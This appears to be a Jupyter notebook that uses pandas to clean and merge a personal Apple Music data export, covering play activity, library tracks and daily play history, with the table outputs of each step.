In [12]:
import pandas as pd

### What to do
* Clean the Play Activity.csv
* Load in Apple Music Library Tracks.json
* Merge on song and album names

### Load Play Activity.csv

In [13]:
df = pd.read_csv("./data/apple/Apple Music Play Activity.csv", low_memory=False)

In [14]:
df.head()

,Age Bucket,Album Name,Apple ID Number,Apple Music Subscription,Auto Play,Build Version,Bundle Version,Camera Option,Carrier Name,Client Build Version,...,Subscription Discovery Mode,Subscription Offer ID,Subscription Pool Type,Subscription User ID,Use Listening History,User’s Audio Quality,User’s Playback Format,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
0,NaN,Are a Drag,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.1 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,YA3,1.608092e+09,False,HIGH_QUALITY,SPATIAL,0,0.0,NaN
1,45-54,Escape (2022 Remaster),277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/17.2.1 model/iPhone14,4 hwp/t811...",3.1,NaN,NaN,NaN,...,NaN,NaN,YA3,1.608092e+09,False,NaN,NaN,0,0.0,NaN
2,NaN,Straight Ahead,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.0 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,False,HIGH_QUALITY,SPATIAL,3600,0.0,NaN
3,NaN,NaN,277175890,True,AUTO_ON,"Music/3.1 iOS/16.2 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,False,NaN,NaN,0,NaN,NaN
4,NaN,"Acoustic, Vol. 2",277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/15.6 model/iPhone12,8 hwp/t8030 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,False,NaN,NaN,3600,NaN,NaN


In [15]:
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,21430.0,1.498300e+04,0.0,0.0,0.0,1.171000e+03,0.0,0.0,0.0,219.0,...,0.0,2.143000e+04,0.0,0.0,0.0,0.0,8.794000e+03,21430.000000,7497.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560021e+08,NaN,NaN,NaN,0.0,...,NaN,2.977425e+04,NaN,NaN,NaN,NaN,1.608092e+09,1763.882408,0.844071,NaN
std,0.0,8.882081e-16,NaN,NaN,NaN,8.900001e+02,NaN,NaN,NaN,0.0,...,NaN,1.748411e+05,NaN,NaN,NaN,NaN,0.000000e+00,1804.042999,73.084068,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560013e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,0.0,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


### Clean the data

In [16]:
df.dropna(subset=['Album Name'], inplace=True)

In [17]:
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12955.0,9.394000e+03,0.0,0.0,0.0,6.150000e+02,0.0,0.0,0.0,219.0,...,0.0,1.295500e+04,0.0,0.0,0.0,0.0,8.644000e+03,12955.000000,7313.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,0.0,...,NaN,3.869054e+04,NaN,NaN,NaN,NaN,1.608092e+09,1917.684292,0.865308,NaN
std,0.0,4.441128e-16,NaN,NaN,NaN,9.404415e+02,NaN,NaN,NaN,0.0,...,NaN,1.965376e+05,NaN,NaN,NaN,NaN,0.000000e+00,1796.774994,73.997779,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,0.0,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [18]:
df.dropna(subset=['Song Name'], inplace=True)
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12955.0,9.394000e+03,0.0,0.0,0.0,6.150000e+02,0.0,0.0,0.0,219.0,...,0.0,1.295500e+04,0.0,0.0,0.0,0.0,8.644000e+03,12955.000000,7313.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,0.0,...,NaN,3.869054e+04,NaN,NaN,NaN,NaN,1.608092e+09,1917.684292,0.865308,NaN
std,0.0,4.441128e-16,NaN,NaN,NaN,9.404415e+02,NaN,NaN,NaN,0.0,...,NaN,1.965376e+05,NaN,NaN,NaN,NaN,0.000000e+00,1796.774994,73.997779,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,0.0,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [19]:
df = df[df['Media Type'] != 'VIDEO']
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12932.0,9.375000e+03,0.0,0.0,0.0,6.150000e+02,0.0,0.0,0.0,219.0,...,0.0,1.293200e+04,0.0,0.0,0.0,0.0,8.624000e+03,12932.000000,7294.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,0.0,...,NaN,3.862483e+04,NaN,NaN,NaN,NaN,1.608092e+09,1915.527374,0.867562,NaN
std,0.0,8.882258e-16,NaN,NaN,NaN,9.404415e+02,NaN,NaN,NaN,0.0,...,NaN,1.966666e+05,NaN,NaN,NaN,NaN,0.000000e+00,1796.916091,74.094094,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,0.0,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [20]:
df = df[df['Play Duration Milliseconds'] >= 0]
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12730.0,9.173000e+03,0.0,0.0,0.0,6.120000e+02,0.0,0.0,0.0,219.0,...,0.0,1.273000e+04,0.0,0.0,0.0,0.0,8.624000e+03,12730.000000,7291.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,0.0,...,NaN,3.868846e+04,NaN,NaN,NaN,NaN,1.608092e+09,1929.238020,0.867919,NaN
std,0.0,4.441134e-16,NaN,NaN,NaN,9.394228e+02,NaN,NaN,NaN,0.0,...,NaN,1.980464e+05,NaN,NaN,NaN,NaN,0.000000e+00,1795.991941,74.109336,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,0.0,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,0.0,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [21]:
df = df[df['Event Type'] != 'LYRIC_DISPLAY']
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12244.0,9.173000e+03,0.0,0.0,0.0,5.890000e+02,0.0,0.0,0.0,0.0,...,0.0,1.224400e+04,0.0,0.0,0.0,0.0,8.332000e+03,12244.000000,7291.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,NaN,...,NaN,4.022412e+04,NaN,NaN,NaN,NaN,1.608092e+09,1952.009147,0.867919,NaN
std,0.0,4.441134e-16,NaN,NaN,NaN,9.302435e+02,NaN,NaN,NaN,NaN,...,NaN,2.017859e+05,NaN,NaN,NaN,NaN,0.000000e+00,1794.233291,74.109336,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,NaN,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [22]:
df.replace({"Event Start Timestamp": ""}, pd.NA, inplace=True)

In [23]:
df.dropna(subset=["Event Start Timestamp"], inplace=True)

In [24]:
df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Source Radio Name,Start Position In Milliseconds,Subscribed State,Subscription Bundle ID,Subscription Discovery Mode,Subscription Offer ID,Subscription User ID,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
count,12244.0,9.173000e+03,0.0,0.0,0.0,5.890000e+02,0.0,0.0,0.0,0.0,...,0.0,1.224400e+04,0.0,0.0,0.0,0.0,8.332000e+03,12244.000000,7291.000000,0.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,NaN,...,NaN,4.022412e+04,NaN,NaN,NaN,NaN,1.608092e+09,1952.009147,0.867919,NaN
std,0.0,4.441134e-16,NaN,NaN,NaN,9.302435e+02,NaN,NaN,NaN,NaN,...,NaN,2.017859e+05,NaN,NaN,NaN,NaN,0.000000e+00,1794.233291,74.109336,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,0.000000,0.000000,NaN
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,NaN,...,NaN,0.000000e+00,NaN,NaN,NaN,NaN,1.608092e+09,3600.000000,0.000000,NaN
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,NaN,...,NaN,3.820895e+06,NaN,NaN,NaN,NaN,1.608092e+09,7200.000000,6328.000000,NaN


In [70]:
df.head(5)

,Age Bucket,Album Name,Apple ID Number,Apple Music Subscription,Auto Play,Build Version,Bundle Version,Camera Option,Carrier Name,Client Build Version,...,Subscription Discovery Mode,Subscription Offer ID,Subscription Pool Type,Subscription User ID,Use Listening History,User’s Audio Quality,User’s Playback Format,UTC Offset In Seconds,Vocal Attenuation Duration,Vocal Attenuation Model ID
0,NaN,Are a Drag,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.1 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,YA3,1.608092e+09,False,HIGH_QUALITY,SPATIAL,0,0.0,NaN
1,45-54,Escape (2022 Remaster),277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/17.2.1 model/iPhone14,4 hwp/t811...",3.1,NaN,NaN,NaN,...,NaN,NaN,YA3,1.608092e+09,False,NaN,NaN,0,0.0,NaN
2,NaN,Straight Ahead,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.0 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,False,HIGH_QUALITY,SPATIAL,3600,0.0,NaN
4,NaN,"Acoustic, Vol. 2",277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/15.6 model/iPhone12,8 hwp/t8030 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,False,NaN,NaN,3600,NaN,NaN
5,45-54,"Acoustic, Vol. 2",277175890,True,AUTO_ON,"Music/3.1 iOS/17.2.1 model/iPhone14,4 hwp/t811...",3.1,NaN,NaN,NaN,...,NaN,NaN,YA3,1.608092e+09,False,NaN,NaN,0,0.0,NaN


### Load Apple Music Library Tracks.json

In [25]:
library_tracks = pd.read_json('./data/apple/Apple Music Library Tracks.json')

In [26]:
library_tracks.head()

,Content Type,Track Identifier,Title,Sort Name,Artist,Sort Artist,Composer,Is Part of Compilation,Album,Sort Album,...,Tag Matched Track Identifier,Comments,Rating,Album Rating,Remember Playback Position,Beats Per Minute,Date of Last Skip,Track Like Rating,Favorite Status - Track,Favorite Date - Track
0,Song,182997530,Shake Ur Body (feat. Di),Shake Ur Body (feat. Di),Shy FX & T-Power,Shy FX & T-Power,"A. Williams, D Joseph, Shy FX & T-Power, A.Wil...",True,Set It Off,Set It Off,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,Song,182997534,Zombie,Zombie,The Cranberries,Cranberries,Dolores O'Riordan,False,No Need To Argue (Remastered 2020),No Need To Argue (Remastered 2020),...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,Song,182997538,Karma Hotel,Karma Hotel,Spooks,Spooks,NaN,False,"S.I.O.S.O.S., Vol. One (Remastered)","S.I.O.S.O.S., Vol. One (Remastered)",...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,Song,182997542,Cold Water (feat. Justin Bieber & MØ),Cold Water (feat. Justin Bieber & MØ),Major Lazer,Major Lazer,"Diplo, benny blanco, Jr. Blender & King Henry",False,Cold Water (feat. Justin Bieber & MØ) - Single,Cold Water (feat. Justin Bieber & MØ) - Single,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,Song,182997546,...Ready For It?,...Ready For It?,Taylor Swift,Taylor Swift,"Taylor Swift, Max Martin, Shellback & Ali Payami",False,reputation,reputation,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


# Load Apple Music - Play History Daily Tracks.csv

In [57]:
tracks_df = pd.read_csv("./data/apple/Apple Music - Play History Daily Tracks.csv")
tracks_df.head(10)

,Country,Track Identifier,Media type,Date Played,Hours,Play Duration Milliseconds,End Reason Type,Source Type,Play Count,Skip Count,Ignore For Recommendations,Track Reference,Track Description
0,United Kingdom,1116868327,AUDIO,20160828,21,231000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Glass Animals - Youth
1,United Kingdom,1129287609,AUDIO,20160828,21,221000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,AlunaGeorge - Mean What I Mean (feat. Leikeli4...
2,United Kingdom,0,AUDIO,20160828,21,165000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,NaN
3,United Kingdom,978194965,AUDIO,20160828,21,115000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Apple Music 1
4,United Kingdom,1057360132,AUDIO,20160828,21,104000,NOT_APPLICABLE,IPHONE,1,1,NaN,NaN,Christine and the Queens - Tilted
5,United Kingdom,1147412003,VIDEO,20160828,21,0,MANUALLY_SELECTED_PLAYBACK_OF_A_DIFF_ITEM,IPHONE,0,1,NaN,NaN,NaN
6,United Kingdom,266232820,AUDIO,20220702,16,289373,NATURAL_END_OF_TRACK,IPHONE,1,0,False,2.662328e+08,Whitney Houston - I Wanna Dance With Somebody ...
7,United Kingdom,456229762,AUDIO,20220702,16,286067,NATURAL_END_OF_TRACK,IPHONE,1,0,False,4.562298e+08,Backstreet Boys - Everybody (Backstreet's Back...
8,United Kingdom,1443758761,AUDIO,20220702,16,270463,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.443759e+09,Aqua - Barbie Girl
9,United Kingdom,1445849203,AUDIO,20220702,16,266921,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.445849e+09,"Christina Aguilera, Lil' Kim, Mýa & P!nk - Lad..."


In [58]:
tracks_df.dropna(subset=['Track Description'], inplace=True)
tracks_df.head(10)

,Country,Track Identifier,Media type,Date Played,Hours,Play Duration Milliseconds,End Reason Type,Source Type,Play Count,Skip Count,Ignore For Recommendations,Track Reference,Track Description
0,United Kingdom,1116868327,AUDIO,20160828,21,231000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Glass Animals - Youth
1,United Kingdom,1129287609,AUDIO,20160828,21,221000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,AlunaGeorge - Mean What I Mean (feat. Leikeli4...
3,United Kingdom,978194965,AUDIO,20160828,21,115000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Apple Music 1
4,United Kingdom,1057360132,AUDIO,20160828,21,104000,NOT_APPLICABLE,IPHONE,1,1,NaN,NaN,Christine and the Queens - Tilted
6,United Kingdom,266232820,AUDIO,20220702,16,289373,NATURAL_END_OF_TRACK,IPHONE,1,0,False,2.662328e+08,Whitney Houston - I Wanna Dance With Somebody ...
7,United Kingdom,456229762,AUDIO,20220702,16,286067,NATURAL_END_OF_TRACK,IPHONE,1,0,False,4.562298e+08,Backstreet Boys - Everybody (Backstreet's Back...
8,United Kingdom,1443758761,AUDIO,20220702,16,270463,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.443759e+09,Aqua - Barbie Girl
9,United Kingdom,1445849203,AUDIO,20220702,16,266921,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.445849e+09,"Christina Aguilera, Lil' Kim, Mýa & P!nk - Lad..."
10,United Kingdom,1442710179,AUDIO,20220702,13,243266,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.442710e+09,S Club - Reach
11,United Kingdom,1445668856,AUDIO,20220702,16,233631,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.445669e+09,Shania Twain - Man! I Feel Like a Woman!


In [59]:
# Split 'Track Description' into 'Artist' and 'Song Name'
split_columns = tracks_df['Track Description'].str.split(' - ', expand=True)
tracks_df['Artist'] = split_columns[0]
tracks_df['Song Name'] = split_columns[1]

In [60]:
tracks_df.head(10)

,Country,Track Identifier,Media type,Date Played,Hours,Play Duration Milliseconds,End Reason Type,Source Type,Play Count,Skip Count,Ignore For Recommendations,Track Reference,Track Description,Artist,Song Name
0,United Kingdom,1116868327,AUDIO,20160828,21,231000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Glass Animals - Youth,Glass Animals,Youth
1,United Kingdom,1129287609,AUDIO,20160828,21,221000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,AlunaGeorge - Mean What I Mean (feat. Leikeli4...,AlunaGeorge,Mean What I Mean (feat. Leikeli47 & Dreezy)
3,United Kingdom,978194965,AUDIO,20160828,21,115000,NOT_APPLICABLE,IPHONE,1,0,NaN,NaN,Apple Music 1,Apple Music 1,None
4,United Kingdom,1057360132,AUDIO,20160828,21,104000,NOT_APPLICABLE,IPHONE,1,1,NaN,NaN,Christine and the Queens - Tilted,Christine and the Queens,Tilted
6,United Kingdom,266232820,AUDIO,20220702,16,289373,NATURAL_END_OF_TRACK,IPHONE,1,0,False,2.662328e+08,Whitney Houston - I Wanna Dance With Somebody ...,Whitney Houston,I Wanna Dance With Somebody (2000 Remaster)
7,United Kingdom,456229762,AUDIO,20220702,16,286067,NATURAL_END_OF_TRACK,IPHONE,1,0,False,4.562298e+08,Backstreet Boys - Everybody (Backstreet's Back...,Backstreet Boys,Everybody (Backstreet's Back) [Extended Version]
8,United Kingdom,1443758761,AUDIO,20220702,16,270463,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.443759e+09,Aqua - Barbie Girl,Aqua,Barbie Girl
9,United Kingdom,1445849203,AUDIO,20220702,16,266921,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.445849e+09,"Christina Aguilera, Lil' Kim, Mýa & P!nk - Lad...","Christina Aguilera, Lil' Kim, Mýa & P!nk",Lady Marmalade
10,United Kingdom,1442710179,AUDIO,20220702,13,243266,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.442710e+09,S Club - Reach,S Club,Reach
11,United Kingdom,1445668856,AUDIO,20220702,16,233631,NATURAL_END_OF_TRACK,IPHONE,1,0,False,1.445669e+09,Shania Twain - Man! I Feel Like a Woman!,Shania Twain,Man! I Feel Like a Woman!


In [69]:
tracks_df[tracks_df['Song Name'] == 'Science Fiction Double Feature']

,Country,Track Identifier,Media type,Date Played,Hours,Play Duration Milliseconds,End Reason Type,Source Type,Play Count,Skip Count,Ignore For Recommendations,Track Reference,Track Description,Artist,Song Name
6777,United Kingdom,291666044,AUDIO,20240828,19,154435,NATURAL_END_OF_TRACK,IPHONE,1,0,False,291666044.0,Me First and The Gimme Gimmes - Science Fictio...,Me First and The Gimme Gimmes,Science Fiction Double Feature
7974,United Kingdom,291666044,AUDIO,20241110,18,35242,PLAYBACK_MANUALLY_PAUSED,IPHONE,1,0,False,291666044.0,Me First and The Gimme Gimmes - Science Fictio...,Me First and The Gimme Gimmes,Science Fiction Double Feature
8038,United Kingdom,291666044,AUDIO,20241114,15,119194,NATURAL_END_OF_TRACK,IPHONE,1,0,False,291666044.0,Me First and The Gimme Gimmes - Science Fictio...,Me First and The Gimme Gimmes,Science Fiction Double Feature
8394,United Kingdom,291666044,AUDIO,20241204,8,154435,NATURAL_END_OF_TRACK,IPHONE,1,0,False,291666044.0,Me First and The Gimme Gimmes - Science Fictio...,Me First and The Gimme Gimmes,Science Fiction Double Feature
8420,United Kingdom,291666044,AUDIO,20241205,20,154435,NATURAL_END_OF_TRACK,IPHONE,1,0,False,291666044.0,Me First and The Gimme Gimmes - Science Fictio...,Me First and The Gimme Gimmes,Science Fiction Double Feature


### Merge dataframes

In [61]:
library_rename = {"Title": "Song Name", "Album": "Album Name"}
library_tracks.rename(columns=library_rename, inplace=True)
library_tracks.head()

,Content Type,Track Identifier,Song Name,Sort Name,Artist,Sort Artist,Composer,Is Part of Compilation,Album Name,Sort Album,...,Tag Matched Track Identifier,Comments,Rating,Album Rating,Remember Playback Position,Beats Per Minute,Date of Last Skip,Track Like Rating,Favorite Status - Track,Favorite Date - Track
0,Song,182997530,Shake Ur Body (feat. Di),Shake Ur Body (feat. Di),Shy FX & T-Power,Shy FX & T-Power,"A. Williams, D Joseph, Shy FX & T-Power, A.Wil...",True,Set It Off,Set It Off,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,Song,182997534,Zombie,Zombie,The Cranberries,Cranberries,Dolores O'Riordan,False,No Need To Argue (Remastered 2020),No Need To Argue (Remastered 2020),...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,Song,182997538,Karma Hotel,Karma Hotel,Spooks,Spooks,NaN,False,"S.I.O.S.O.S., Vol. One (Remastered)","S.I.O.S.O.S., Vol. One (Remastered)",...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
3,Song,182997542,Cold Water (feat. Justin Bieber & MØ),Cold Water (feat. Justin Bieber & MØ),Major Lazer,Major Lazer,"Diplo, benny blanco, Jr. Blender & King Henry",False,Cold Water (feat. Justin Bieber & MØ) - Single,Cold Water (feat. Justin Bieber & MØ) - Single,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,Song,182997546,...Ready For It?,...Ready For It?,Taylor Swift,Taylor Swift,"Taylor Swift, Max Martin, Shellback & Ali Payami",False,reputation,reputation,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


In [62]:
library_tracks.describe()

